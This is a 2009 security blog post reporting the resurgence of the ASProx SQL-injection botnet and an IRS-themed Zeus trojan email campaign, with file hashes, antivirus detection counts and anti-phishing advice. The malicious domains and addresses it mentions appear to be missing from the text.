Thursday, October 01, 2009

Cyber Security Awareness Month: Day One

The Department of Homeland Security has designated the month of October to be Cyber Security Awareness Month, and we are off with a bang!

ASProx Compromised Webpages

Last night we received word that the ASProx SQL injection attack was back in full swing. After several months of no activity, this botnet is back to its old tricks of attacking vulnerable the ASP pages on IIS Servers trying to add a malicious javascript link to legitimate webpages by manipulating the underlying Microsoft SQL servers.

The main site which is hosting the malicious code right now is "". Sites which have been hacked by this attack tool will contain a tag which leads to the page "". A quick Google search for this string will currently reveal more thousands of webpages which have had this code injected.

The Javascript causes an IFRAME to be loaded which causes the following file to be loaded:

That domain was registered on September 29th with the email address

I wasn't sure if I should try my malware analysis VM 30,000 feet over Wichita Kansas, but I gave it a shot. The index.php file downloads a hostile Flash Player file:


That file is only 797 bytes. VirusTotal has 1 of 41 detects for it, with Symantec calling it "Bloodhound.Exploit.266". The MD5 is 148a8c05fb0b63f036f024e2104a6e4c

The index.php files also causes a malicious PDF file to be downloaded. When the PDF file is opened by an older version of Adobe Reader, the computer becomes infected with one of the "scareware" fake Anti-virus products.

Unfortunately, I don't have a vulnerable copy of Adobe Flash Player handy, so I can't tell you yet what is downloaded by this flash file.

Let's take a search engine agnostic approach for a moment though: shows pages injected with: lists these as the top sites injected with "":

Yahoo! lists only 823 results on with top hits being:

AOL's search gives a number of results for "". One thing that cracks me up is the "sponsored links"! Can someone possible have bought adwords for that? When I search the path for this hostile Russian hosted javascript attack tool, I am told that:

"Apartments in El Paso, TX"
" The Safest Site in Online Dating"
"Tv Ads, Create & Run Video Ads Online"

are sponsored links for that search.

The domain names involved in this scam are all Fast Flux hosted, meaning that machines belonging to a botnet are used to resolve the website addresses. The traffic is then proxied from those IP addresses to the "real" criminal server. Here are some recently used IP addresses. If anyone recognizes that botnet, please shoot me an email:

IRS Version of Zeus

I'm actually blogging this using my free trial of Delta's "GoGo" WIFI service as I fly back from San Jose, where I was speaking at the Merchant Risk Council meeting. What is the primary email that I'm downloading this morning? Its still the fake IRS emails which are being used to distribute the IRS version of the Zeus Bot trojan.

So far this flight I've received 330 copies of the current IRS Zeus email. The domain names used in these emails are:

The binary its dropping is brand new - I was the first one to have it scanned at VirusTotal. As usual with the new binaries, detection is not very good, 9 of 41 antivirus products are currently detecting it, but at least we do have some of the Big AV Guns on board.

See the VirusTotal Report Here.

Detects from F-Secure, Kaspersky, McAfee, Microsoft, Sophos, Sunbelt, and VBA32 right now.

File size: 96256 bytes
MD5...: 36ac39070d175b21cb2f46e2bdfe668c

Don't Be a Phishing Victim

Today's BBC News quotes Rohyt Belani, the founder and chief executive of Intrepidus Group, a security consultancy:

"Our studies have shown that within the first hour of someone receiving a phishing e-mail, 60% of people click on them. That is not enough time for the security folks to act."

I agree with Rohyt totally, and would urge the consumer message of the day to be "BE CAREFUL with links in your email". If your bank really has an important message for you, go to your bank's website in the way you would normally log in, and do so. If there are important messages from your bank, you should be able to find them there easily.

No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.